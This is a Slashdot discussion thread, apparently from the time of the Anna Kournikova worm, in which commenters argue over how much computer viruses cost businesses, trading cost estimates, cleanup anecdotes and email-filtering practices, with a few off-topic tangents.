
Has this virus cost anybody money yet? Anybody's email server gone down today? Like most virii, it only affects Windows users...

Re:The Windows Platform is Costing More by the Min

[SiriusBlack]

And your company will keep paying this money, as the cost of re-training user to use a different platform is estimated at about $2000/seat.

Concentrate on phasing in Linux/BSD on those platforms that don't effect the interface presented to the average user, i.e. servers, first!

Antivirus software are part of the cost

[soeliang]

1. Buying antivirus software is consider lost of money.
2. No antivirus software able to detect 100%
of the viruses.
3. Some antivirus software will crash with existing application.
4. Most server antivirus software will slow down the system
5. Some antivirus software will interrupt backup software. So you might risk not having a backup
6. Antivirus software user training
7. Enterprise antivirus software are too complex today. It even become one of those "production" software that took excessive adminsitrator time for some organisation.

Just total up the above cost you will get the 17 billions figure.

some numbers...

[saarbruck]

A company I worked for a few years ago got hit with the 'hemp' virus (despite having some anti-virus software installed, I guess we just weren't practicing safe software).

Anyway, it took a week to recover. We lost a week of development (probably the worst thing for an already tight console game schedule) and discovered that a lot of our backups were corrupted. Luckily we were able to find a fairly recent viable one and didn't lose a lot of code or artwork. But we did have to reformat and reinstall every system we had.

So let's see, we had 6 engineers @ $50k/yr. (yeah yeah, we were all entry-level), 10 artists @ 40k/yr., one IT person, let's say 70k. That's about 6000 + 8000 + 1400 = $15,000 in the weekly salaries of the grunts alone. Not to mention building rent or management overhead, and loss of morale.

On a personal note, I lost 2 GB of MP3 files. It was not a tragedy, since I do own CDs for most of my music and could re-encode them, but what a pain! From an engineer's point of view, however, I have to say that it was fascinating to watch the little bugger do its work and change its "gotcha!" message every few hours...

Viruses Cost Substantial Money

[NetOmen]

I beleive some of you are mistaken when under judging the power of viruses... When judging the cost of viruses on a company you can not compare with 'vb viruses' that some script kiddy made. The truth is that there are far more viruses than vb macros. Imagine a viruses that when ran infects every .com/.exe file on your computer, or better yet resides in your masterboot record or BIOS itself?? These things that you call viruses will just lay resident in your system until a set option has occurred (xxx files infected, ??/??/?? has reached, Connected to the internet ect..) then they will create havoc on your system. I will leave it to you to decide how much it would cost a company to get a modified CIH clone virus that sends itself through the e-mail to all the employees (mind you it looks like they are receiving it from a fellow employee) Then all of a sudden they open it out and BAM!!... nothing happens.. What you say? They all of a sudden 2 months down the road all of a sudden you find that the bios is filled with sh|t and you can not start your computer, so you go out to buy a new BIOS chip just to find out that F^ck your whole harddrive is erased... Now of course this is a worst case viruses, more common viruses just get executed whenever a .exe/.com is executed and make your system run slow (intentially) so you may be running a virus on your 866 mhz that behaves like a 166 mhz... Now if that does not cost money than I do not know what does? Anyways that is my two-cents-worth on costs of viruses.

Plural of "virus"

Viruses.

See http://language.perl.com/misc/virus.html.

causes...

[Danse]

I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

But those things are not legitimately attributable to viruses. Those are attributable to hiring idiots for admins.

The rest of your post I agree with.

Re:How much do virus *myths* cost businesses?

[Jason+Earl]

Fah, I have a whole pile of systems that were deemed to be not Y2K compliant. Of all of them one required that the clock be reset, but only under Windows, it runs Linux just fine.

The rest of the world spent far less on their computer systems, and yet there lights stayed on. Y2K was a myth, for all intents and purposes. But it got rid of a lot of cruft, and it made a bunch of hardware and software companies very wealthy, so it wasn't all bad.

Re:Neither Macs nor *nix machines are immune

[Jason+Earl]

The chances of such a worm propagating are essentially nill. The trick worked in this one particular case because you happened to know exactly the software that your friend would be using. If your Applescript were sent to a Mac user that used some other email client it would have simply crashed. There simply aren't enough Mac Eudora users to sustain such a beast.

You tricked one guy (who you happened to know), but how many of the messages in his inbox were from Eudora using Mac addicts? And of those few who actually use the right type of software how many of them would open up any random jpeg from your buddy without poking at it a little first?

Microsoft is certainly responsible for creating software with such disregard for security. But it isn't the fact that all of the other email clients in the world are so much more secure that keeps their users from becoming targets, it is the fact that Windows + Outlook has the largest install base. There are scads of gullible Windows users, and there is a good chance that most of the addresses in a typical Windows User's address book are running the same sort of software.

Re:The real cost of viruses...

[Jason+Earl]

There is still lost time. For example, the system administrators probably had something else they needed to be doing. In most of the organizations I have worked for the sysadmins don't just sit around all day playing quake and waiting for a fire. The lost time simply applies to all of the things that the sysadmin could have accomplished if he hadn't been cleaning up viruses. If your systems adminstrators are only busy when you have a virus, eliminating viruses would allow you to cut back on the amount of systems adminstrators that you hire.

Also, there is the fact that when a virus epidemic hits there are generally more than one system affected. Email servers are shut off, multiple workstations re-formatted and re-seeded. The largest expense of nearly any business is its payroll (in the US anyway). If a part of a company's workforce is unable to work at peak capacity it is squandering it's most costly resource. Viruses often affect entire departments, and can cost real money to a business.

Re:OnTheFly Source

[sheldon]

The same virus could be written in ECMAScript, aka Javascript, aka JScript.

Re:Microsoft

[sphealey]

"When you get right down to it, it's really Intel's fault. Their CPUs will run any code, without giving any thought to security... "

Sorry, x86's since the 80286 have included multi-ring security. Too bad no one ever implemented anything with it...

sPh

Re:"Loss" == "IRS allows you to write it off".

[sphealey]

"I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.
Therefore things like software piracy, virus attacks, are not losses."

That's funny. My coworker and I, who are 100% scheduled from now through April 30th on an ERP implementation for a small manufacturing company, have spent the last three hours (and appear to have about 3 more to go, or a total of 12 manhours) working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny (and yes, I know the users shouldn't have clicked on that). Now, that's 12 manhours down the drain. Plus, when I arrive at the manufacturing site tomorrow, I won't be prepared for the work I was going to do, and another 8 hours or so of everyone's time will be wasted as we try to work through that unprepardness.

Now, exactly how is that NOT a cost?

sPh

How ironic.

[IGnatius+T+Foobar]

It's ironic that this story should appear on Slashdot just as Yet Another Visual Basic Virus spreads through the address books of everyone who uses that digital Petri dish of an e-mail program called Microsoft Outlook (or, based on the number of virii it spreads, perhaps it should be called Microsoft Outbreak instead).

The cost of virii is directly proportional to the stubbornness of both users and IT managers who refuse to get rid of programs like Outbreak which have repeatedly demonstrated this sort of problem, with no real remedy on the horizon. Infect me once, shame on you. Infect me twice, shame on me. Infect me three times, and I deserve to die because I'm not taking precautions!
--

Re:$0 since fall of 1998.

[jht]

We're an MS Enterprise licensing customer - for our licensing fee (which isn't bad), we get the rights to any version of desktop Windows, and version of Office up to Professional, and all server/BackOffice CALs we need.

Outlook and Exchange come with the territory - it's be tougher for us to substitute a different mail system than the payback would justify.

Personally, I'd prefer a nice IMAP-based system that is less vulnerable to begin with, but if you manage the system carefully you can make the MS stuff work acceptably well - which is nice when you work at a company that's drank the Microsoft-branded Kool-Aid.

- -Josh Turiel

$0 since fall of 1998.

[jht]

In 1998, a few months after I took the sysadmin job at my company, we had an infestation of the Class macro virus. It was a pain to clean up and deal with, but my staff and I took care of it in about a day - no data was lost.

After that, we put up an SMTP scanner/gateway between our Exchange server and the rest of the world. I set up filters to automatically block anything executable at all via e-mail, including stuff like .SHS and .VBS files. We have not had an infection of any sort since then - the antivirus portion of the gateway is updated with every update released (engines and definitions), and the clients are updated through management software that updates automatically as well - and the clients are locked into the most paranoid settings available.

The downside is that I'm the "no fun" admin (since we block all the fun programs from e-mail), but on the other hand I've counted 26 copies of the "Kournikova" worm today alone that have bounced off our server harmlessly. I think it was worth it for sure. Since I'm stuck with Windows for the forseeable future, I'm happy with what I can do to prevent these from affecting us.

So our ongoing cost to really deal with viruses is $0. But I do have software costs (annual licenses), plus some time spent devising our strategy and implementing it. But that's part of the job - I can't really call it "virus costs".

- -Josh Turiel

Re:Hope none of y'all are framing carpenters

[unitron]

In the U.S. a "two by four" (when not referring to some sort of seating or driven wheels arrangement on a truck), is a piece of lumber, the rectangular cross-section of which measures 1 and 1/2 (one and one-half) (1.5) inches by 3 and 1/2 (three and one-half) (3.5)inches.

Commercially available lengths usually start at 8 feet (96 inches) going up in length in multiples of 2 feet (24 inches).

A "stud" is usually 93 inches in length, which means that nailing them at right angles to a 1.5 inch thick bottom, or sole, plate and a 1.5 inch thick top plate results in an 8 foot wall. (In construction the question of when to say "foot" and when to say "feet" is answered "it depends")

If you remodel a house built in the early 1950's you'll find that the "2x4's" used back then are slightly wider and thicker (by either an eighth or a sixteenth of an inch, don't feel like going out in the rain to the shop to the woodbin with a tape measure just now) and the studs are shorter by double the thickness increase so that the wall is still 96 inches high.

Extrapolating back there was probably a time when 2x4's were 2 inches by 4 inches wide and thick (or thick and wide).

In the context of the original post, a 2x4 is a board that you can wrap your hands around and use to beat someone with or threaten to do so.

Re:Virus cost:

[unitron]

The difference is that the virus is more reliable, works with a wider range of hardware, requires fewer resources, and the author probably won't sue you for reverse engineering it if you can't find the source code.

Re:Starting a virus is like arson.

[Lemmy+Caution]

The reason it is a boneheaded over-reaction as a response is that .vbs viruses are easily readable, and the exact nature and extent of their damage and the locations they are placed easily determined. VBS viruses are no more mysterious that a .sh 'virus' would be. Once you remove the responsible files and registry entries, there's no problem.

Re:Starting a virus is like arson.

[Lemmy+Caution]

This is true, but completely tangential to what we were talking about: none of the things you describe are remediated by the measure of rebuilding a bunch of desktop machines out of the belief that "unknown" damage can't be repaired by more straightforward mechanisms. All the things you describe are true, but if they happened they would be made obvious by looking at the payload.

Re:"Loss" == "IRS allows you to write it off".

[Pig+Hogger]

That's funny. My coworker and I, ... have spent the last three hours ... working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny. ... Now, that's 12 manhours down the drain.
...
Now, exactly how is that NOT a cost?

Think of it as an extension of the Microsoft tax, or, alternatively, a tax on stupidity.

--

Re:Next to nothing, if you're doing your job.

[Raptor+CK]

True. Fortunately, we're practically immune to VB scripts, since we block them at as many places as is feasible. Sadly, we can't really stop the flow of Word documents, but we disable macros, and so on.

"Real" viruses may have better luck getting in, but we're generally up to date with the updates.

As for Ghost, we'd use it (in fact, I've been pushing for it), but to get it done legit is expensive. Not a problem to me, but I don't always get the gear/utilities that I want because of price. Oh well.


Raptor

Next to nothing, if you're doing your job.

[Raptor+CK]

It's been said by others, and *yes* I know that this barely *cough*Redhat*cough* affects Linux users, but how many corporations use Linux for all their employees?
Under Windows, you do the following:
a) Install Norton on every machine
b) Pay for LiveUpdate
c) Set tight-fisted policy, so that anyone who breaks it realizes that it's their fault, and they *may* get bumped to the bottom of the queue
d) Use a mail server capable of decent filtering (procmail is excellent for this, and your unix box can relay to Exchange if you *really* need it)
e) Network profiles and user directories, with a solid backup rotation.

Of course, everyone here knew that, right?

I've dealt with this before. We've fixed it in a matter of minutes due to good policy, an extra box lying around, and a tight-fisted reign over the network.

Raptor

Not much $$$ for us..

[MikeFM]

Most of our machines run Linux so does are automaticlly virus free. We also use MacOS and Windows which we keep updated with the latest virus scanners. Given that these updates are available for free online and can be automated the cost isn't much. Due to some problems with our old software working under Windows 2000 we've had to switch to Outlook for mail and I feel that may increase our problems but so far it's been nothing big. I'm considering setting up virus scanning at the mail server level (runs Linux) to take care of that problem but that takes very little effort. I'd say viruses cost maybe $100 in upkeep and monitoring a year.

Very Little....Probably

[sharkey]

We don't really have an accurate measure here. I know what the Love Bug cost ME, since I got to go and clean the little fucker off the dozen or so morons desks that opened it. During that whole time I got to listen to them bitch about how they had nothing to do. They weren't even able to catch the hint that they caused it themselves. Finally, we just told them that we could not have it fixed the same day, and told them to go home. After that we were able to finish the job quickly and easily.

From a pure production stand-point, we lost some $$ since we shut down the mail-swerver until we fixed it, but still, who knows? We lost a days worth of work for 12 people doing various production-related things, most of a day of my projects which have a direct impact on the entire company rather than a single dept., and we had no email for 6-8 hours which threw a kink into everyones communications. Hard to measure.

I did get some payback that day. Since we run an email-to-fax gateway, the 3-4 people who had a Contacts list full of fax addresses got to deal with a shit load of calls from irritated correspondants who were getting 10+ page faxes full of I Love You's code.

--

The question is...

[Black+Parrot]

To rephrase Marilyn's Sugardaddy:

Ask not what viruses do cost; ask rather how much they could cost.

Face it: most viruses (so far as we know) are little more than nuisances. Yes, they cost money because they waste a lot of people's time and bandwidth, but that's about it.

But what happens when people start writing more insidious virues?

Say: flip a random bit in a random data file. Those bits add up over a few years, and even if you had two years' accumulated daily backup tapes, it would be nigh impossible to rebuild clean data from them. So what happens when you go to work one day, start troubleshooting a problem, and suddenly discover that you can't trust any of the data on any of your company's computers? And can't even confidently demonstrate which files are corrupt and which aren't?

Or: suppose someone uses a virus to cover a more sinister attack? The bank's IT staff congratulate themselves at how quickly they squashed a viral attack, not realizing that one of those messages had the same subject line and same .vbs name, but carried an altogether different payload.

Other scenarios should be easy to come up with as well. The surprise is that the virus writers haven't come up with them yet. (Or haven't they?)

My point is: yes, headlines probably use grossly inflated figures for the cost of virus attacks, and yes, most of them could be shrugged off as annoying pranks. But will it always be that way? Rather than playing down the seriousness of viruses by pointing out cases of obvious or probable exaggeration, we should be trying to scare the bejesus out of our clients and employeers, before "the big one" comes along.

--

Re:OnTheFly Source

[Black+Parrot]

> What's interesting is how it decodes itself from the string.

I saw something recently about how the anti-virus companies are starting to whinge about how the number of different compression schemes available out there makes it really hard to create signatures for all the viruses. Same virus, different compression ==> different signature required.

--

Other stats.

[Matt2000]

While we're at it, can we get some independent academic research into other unquestioned numbers such as losses due to piracy?

These estimates get quoted in a couple articles, then stated in court and suddenly they're real and no one wants to question them.

Re:How much do virus *myths* cost businesses?

[s390]

A US "2x4" is a length of softwood building material nominally 2" by 4" in cross-section before planing, actually about 1-3/8" X 3-1/8" (3.5 cm X 6.25 cm approx.) after finishing.

A 2x4 is also at times known as a "clue stick."

Re:Personal estimate..

[s390]

No need to annoy the users to update their virus definition files... Norton AntiVirus will do that for you! I imagine McAfee, etc. can do this also.

And you can set up scheduled virus-scans in your Windows clients, make this part of the standard load image. My notebook Win2K client does it now.

Hovever, the general vulnerability of MS Windows software to viruses is a _great_ motivator for a company to look into using Linux on the desktops.

Give me an ever-better Wine to run MS Office apps, plus a Linux version of Lotus Notes, and SecureID SSL encryption ported to Linux, I won't use Win2K!

The best way to pay for the effects of viruses ..

[cje]

.. is to require the responsible parties to pay for them. By "responsible parties", I'm really referring to two groups of people. First and foremost are, of course, the authors and/or originators of the virus. Certainly, when they unleash a destructive virus on the computing community, they are culpable for much of the damage that is caused. The second group is one that doesn't get discussed a whole lot .. the users who spread the virus. Clearly, the brunt of the blame lies with the virus authors, but surely those "promiscuous" users who allow the virus to spread are partially at fault as well.

This country (and, in many ways, the entire Western world) has been transformed into a place where there is no such thing as personal responsibility anymore. If you spill a cup of hot coffee on yourself, it's not your fault .. it's the fault of the person that served it to you. If you're daydreaming while walking and trip over a crack in somebody's sidewalk, it's not your fault .. it's the fault of the homeowner. And if you stupidly open an overtly suspicious attachment and unleash Dante's lowest level of Hell on your corporate intranet, it's not your fault, it's the script kiddie that wrote the virus!

I hereby call "bullshit" on this. People need to be taught a basic modicum of computer security common sense. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued? I'll tell you what: a moron who blindly clicks on and opens every single attachment they get will think twice about it if they have to put a couple of month's worth of mortgage payments on their credit cards because half of their paycheck went to paying the tech support guys to clean up the mess they created.

Viruses can be thwarted so that their effect is minimal, but this is not going to happen so long as user stupidity is coddled and encouraged and users who do stupid things are allowed to claim that it's "not their fault." It's not their fault that the virus was created, of course, but it is their fault that they did a very stupid thing that cost a lot of people a lot of money. If you start making people pay for their mistakes, you'll find that they wind up making a hell of a lot less mistakes.

Viruses *helped* our business prosper

[revscat]

But surreptitiously releasing a modified copy of "I Love You", we were able to determine with a high degree of accuracy which of our resources were, in fact, complete and total dipshits. After sending out a company wide email with the subject "WARNING: I Love You! DO NOT OPEN! VIRUS INSIDE!", many, many employees (mostly from legal and marketing) were immediately identified as being dipshits. We cut the fat, as it were, and are now a leaner, smarter organization better able to meet the challenges of the 21st century, sans dipshits.

Virus costs

[ajs]

The largest costs in the companies that I've seen are: software and meetings.

Software licensing costs for anti-virus software are huge for a medium-to-large business. Also, the time spent in "what do we, as a company do about virii" is non-trivial.

In the ideal company, anti-xxxx tactics (where xxxx is any sort of intrusion, theft, vandalism, etc) would be left to the people who do the job, but this is rarely the case.

Re:Stupidity

[Tower]

Yeah, a couple of my friends here at work went to NDSU... Being as they have EE degrees, they probably saw a computer or two while they were there, though I don't think I could move that far north - leaving the tropics here (Rochester, MN) would be a harsh shock ;-)

Now about 'dem hossless carriges... 8^)
--

Productivity and Cost

[_Sprocket_]

The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency. This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

I would argue the inverse - if a person was able to carry on their "regular" work AND handle the virus incident, you would have an argument for no real cost. But we know that tends not to happen.

Time is a finite resource that is closely linked to productivity. Productivity is linked to the completion of projects. When one's time is taken up by unscheduled workload (ie: the virus incident), current projects tend to suffer. That means the project either slips or more time has to be thrown at it. Where do you get that time? You hire more people to work the project, increasing the available manhours (time) and increasing the cost.

Whether these virus scares SHOULD cause such an impact on an organization's available time is an entirely different matter.

Same here...

[cr0sh]

The announcement went out that no one should use email, I walked around a little bit later looking for my manager (he had asked me to look at the code to the script, find out what it does - not much anymore, other than waste resources, it turns out) - the office was near empty: Everyone went to lunch!

If that isn't lost money, I don't what is!

We use Windows (unfortunately) for a lot of our stuff, and most everybody uses Outlook - I use Netscape, and I consequently DON'T HAVE A PROBLEM (Netscape doesn't know what to do with the attachments). Also, I uninstalled Windows Scripting, so that nips it as well.

I have tried repeatedly to get the IS dept or anyone who would listen to switch to something else, filter VBS scripts at the server - something: All to no avail, so far...

Worldcom - Generation Duh!

Re:Stupidity

[Tackhead]

>http://mast.mcafee.com/mast/mass_map.asp

The frightening thing to me - how the hell does McAfee get the data that makes up the map?

If I were running antivirus software, the last thing I'd want is to have it phoning home to tell some third party that I was infected.

Sounds like a privacy/security nightmare.

Starting a virus is like arson.

[Ungrounded+Lightning]

So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?

What's boneheaded about it? Can you think of a way requiring LESS down time to make SURE that the virus and anything it corrupted is removed from ANY computer at the company?

Starting a virus is like starting a fire - in this case one that burns through all the computers that are susceptable. After the fire is out the firemen are going to water the ashes and dig them up to make SURE it's out, and build firebreaks to keep it from relighting from the surrounding area (which may still be burning).

Re:Opportunity cost

[Ungrounded+Lightning]

You're assuming that $1 in the future is worth $1 today. In reality, the farther into the future you look, the less a dollar then is worth today.

No, I'm not. I explicitly took that into account with the "bank account" analogy for the time-difference in value of the money.

The cost in current dollars is the amount you have to put into the interest bearing account, in order to have the money to cover the shortfalls at the time they occur. Future withdrawals are a greater number of dollars then the initial deposit.

what it cost us

[ZeissIcon]

We had one person get infected with the I Love You virus before we were aware of it and notified people not to open blah blah blah. It took a sysadmin 10 minutes to disinfect the affected computer.

Sysadmin salary/120,000 minutes worked per year*10 minutes= $4.16

That's our total loss. If you decide to count the amount of time spent learning about viruses, that means you count the amount of time we spend with Bugtraq every morning, which we would do anyway, so that's a wash.

Yeah, $4.16. That's about right.

I agree, it's nothing

[iceT]

Whenever I submitted a project to get funding based on 'productivity gains', they tell me that that 'productivity is an "intangible cost"', and therefore it cannot be used.

If that's so, then lost productivity because of a down 'down system' also is 'intangible', and therefore has no affect on 'cost'.

Hey, it's THEIR rules...

Re:Caution: Anecdotal evidence

[technos]

This one is a harmless worm. Polite even. It even sets a registry flag so it won't run more than once.

Y'know, it'd be cheaper to just make everyone click it and not have to worry about reinfection than to spend money on a virus scanner. Or hell, less money on bandwidth spent by clicking it than downloading a new definition file.

I don't understand

[Pfhreakaz0id]

If you have to run outlook, put outlook in the restricted zone. Set restricted zone to turn off, activex, javascript, java, etc.... Don't open attachments that look fishy. I've done these two things and have never gotten a virus (except for once when some other idiot ran an attachement which infected files on network server, and I got the file, but my virus checker caught that and cleaned it up).
---

And Then...

[Greyfox]

The people who care for the systems come and do a reinstall at $60 to $120 an hour. What's a typical system load for Windows (It was solid 8 hours for OS/2 back when I was doing onsite support.)

What, you mean like...

[Greyfox]

The Q Virus?

Seriously though, you can quietly manage the whole thing. You don't have to have the whole company up in arms over it.

Fuzzy math

[WiggyWack]

Many of the figures used in showing how much money businesses use are really off base. For example, take "cyber slacking", the term often used for employees using the Internet at work for fun, not business. They do some survey where they learn the average person says they spend 30 minutes of their work day "cyber slacking". Then they say the average person get paid $15/hour (or whatever) so that's $7.50 per worker per day. If there's 100 million workers, then business is loosing $750 MILLION DOLLARS A DAY!!!! Dumb. Anyway... I hope that's not too off topic but sometimes that's how business thinks. Perhaps with the virus thing they figure out how much their tech people who fix the stuff are paid and then add up the hours spent fixing virus-ridden systems, etc... What they don't take into account is that those tech guys are probably on salary and if they weren't fixing the virus problem, they'd be doing something else.... Like cyber slacking. :)

Re:OnTheFly Source

[biglig2]

Well, since it's been obscufated, no it isn't very interesting ;-)

Anyone de-obscufed it?

Typically I'd have to say the numbers are wrong.

[haystor]

The numbers I most often see go something along these lines: If a company sells $10million a day, and it gets knocked offline for 6 hours they will say they lost $2.5million. Of course this doesn't take into account shifting revenue to that time beyond the actual outage. This is more applicable to a DDOS attack, but companies seem like to latch onto big numbers using simple math.

The real cost for a single instance of a virus is dealt with mostly costs in overtime for personnel while things are restored, inspected, and placed back into service.

The real cost overall is having to buy the software to protect against virii, and hiring the people that do nothing but guard the network. These costs don't contribute to the bottom, they merely protect it. This is the real cost of a good virus, it just usually isn't paid until someone catches something (when it should have been paid all along).

criminal economics

[philipm]

This just shows how anyone believes any numbers they read.

Like all other forms of crime, computer viruses actually make money for countless people.
From the products and salaries of virus companies, to cops salaries, to the salaries of reporters and other media, crime is great for absolutely everyone but a tiny irrelevant minority.

I was on site at a company in NY...

[SethJohnson]

I was on site visiting one of our customers in NY when the luv bug virus broke out. I was helping one of the top admins with our product when everyone rushed around shouting that the e-mail server was down. It was thursday at 4 in the pm.

After a quick survey of the mail server, it was found that it had run out of space. Why? Was it copies of luv bug? No. The director of the IT dept., just before jumping in his car and driving home, had sent an e-mail out to every single alias he could think of warning users to update their virus definitions with the ATTACHED symantec updater. The damn thing was three megs. Because most users were on several different aliases, they all had it copied to their mail boxes as many as eight times. Deleting all those mails from each user's box was a very tedious and time-consuming process, let me tell you.

This was perhaps the most brilliant protection against a virus infection I have ever witnessed.

Seth

Re:The best way to pay for the effects of viruses

[Nidhogg]

1. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued?

Odd that you should mention this. I did determine which one of my users opened it first. And while I didn't go to the extreme that you said of taking money from his pocket... I did send out a company-wide email jokingly pointing the finger at him (I called him a dead man).

A little public humiliation can go a long way. I will guarantee you that he'll think twice about opening attachments from now on.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Simple Math...

[jonfromspace]

1 quarter to call someone who cares for each infected system.

According to the New McCafee Virus Map:

Luvbug.vbs infected
So, 10,000x$0.25 = $2500.00/day

Therefore - Today, Luvbug.vbs cost Americans $2,500.00 today...

Re:Simple Math...

[jonfromspace]

ARGH! Slashcode ate my less-than symbol...

above should read less than 10,000 infected systems

Re:Caution: Anecdotal evidence

[sulli]

I got one copy of the virus, and deleted it. Cost: one minute.

I read one Slashdot article about viruses (this one), and am responding to it. Cost: two minutes.

'Nuff said.

ILOVEYOU

[schroet]

Last year when ILOVEYOU hit I worked for #49 in the Fortune 100. In the aftermath, Management estimated we'd spent 2400 hours of employee time cleaning it up, not to mention our corporate email was down for 3 days.

How much they cost here

[Mr.+Foogle]

Back of the envelope figures; most of my end users are PCB designers and charge a pretty hefty sum per hour worked.

When a 'worm' or other VBS mayhem is rampant:

$ 110 per billable hour (average) x 10 minutes per hour to wade through excess mail $ 11 dollars per end user per hour. x 15 end users $ 165 per hour + 30 bucks an hour for my services = 195 per hour.

That's when there is an active .VBS worm running loose. These prolems have seldom lasted longer than 2 hours - and that is due to the mail admins living on the West Coast and not being available as soon as the East Coast facilities are hit.

Otherwise, I'd guestimate that I spend at the most 2 work hours per week on virus and work related issues - that's average. Some weeks more, some weeks less, some weeks none at all.

Above figures are for a small part of a larger manufacturing concern.

Re:"Loss" == "IRS allows you to write it off".

[onepoint]

Well if software sites on a shelf and is not sold, it can become a write-off. The value of the write off is cost of production per unit.

A virus has a cost associated with it. Cost of productivity. Can we write it off. Hmmm software bought to prevent it happening again, extra copnsultants brought into the firm to upgrade systems ....

That the way i see it.

How the tax sytems work I don't know but I would not be surprised if some-one could claim it if there was enough proof and well documented claim.

example:
Traveling salesman that has full account of his time in a writen ( hand ) log. He/She could put computer down time as a loss of sales and presentation for the amount of days the system was down, proratedly only for the days the computer would be used based on a historical documentation of the hand writen log file.

there was a great acticle in forbes magazine about how to manage your records for the IRS. This included those people that were gamblers and other types of people that have to keep a written log.

ONEPOINT



spambait e-mail
my web site artistcorner.tv hip-hop music news
please help me make it better

Lost productivity

[SiriusBlack]

I've deleted a half-dozen virus-containing emails from my inbox within the last half hour -- which means there are at least 6 people in my company stupid enough to open a .VBS attachment!

The original love letter virus cost millions in lost productivity, because it crashed thousands of (Exchange) mail servers. Also, I lose productivity everytime I reboot, because I have to wait for Norton Virus scan to download new patterns and scan my hard drive. Also, on an older system, the virus scanner interacted with Netware to crash Windows every time it tried to boot up, which cost me several hours of lost work until the IT department finally relented and told me the password to disable the virus scan function!

Interesting to note, however, that all these costs were incurred only on systems running MICROS~1 software... the more interesting question is "How does the cost of virii to Windows users compare to the cost of virii on non-windows users?"

Should buffer-overflow (stack smashing) and root exploits be included in the costs analysis? If not, it seems like the costs to Linux users is zero...

Hidden cost

[joecool12321]

I think the costs are higher than corporations are willing to admit. I don't know about virus' specificly, but in "Information Warfare" by Winn Schwartau (I think I spelled his last name correctly) he talks about the damage bugs in general do to business. If they admited to the public that there were such problems, their stock integrity would drop drastically.

Why virus cost companies so much

[PureInsanity]

Total damage caused by virus: 1 million dollars Total money spent on people to access cost of virus damage: 16 million dollars.

About VBScript . . .

[llywrch]

I happened to see the O'Reilly book on VB Script this weekend, & was amazed to see their choice for the animal on the cover . . .

A flu virus?

The collophon claims this is a drawing of a Sea Urchin. I'm not convinced.

Geoff

Re:The real cost of viruses...

[MosesJones]

What complete tosh.

Let imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So thats the cost before you even talk about time.

Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average persons time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.

Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".

I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.

Is that supposed to be funny?

[SnakeStu]

This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.

So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.

Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!

Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.

There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.

I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.

And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.

Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?

Personal estimate..

[technos]

We've got a few thousand users in fifteen countries. If all infections were like todays spat of VBS/SST.Worm, it'd cost us more money to find the yearly cost than the cost itself.

But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.

Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.

Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someones ass.

Caution: Anecdotal evidence

[rkent]

Well, I haven't conducted a thorough study throughout the organization, but we *just* got hit by the Anna Kournikova virus, and here's about what happened:

• I saw 10 messages with the same subject arrive from 10 different people, and said "hmm, a virus, I think I'll delete them."
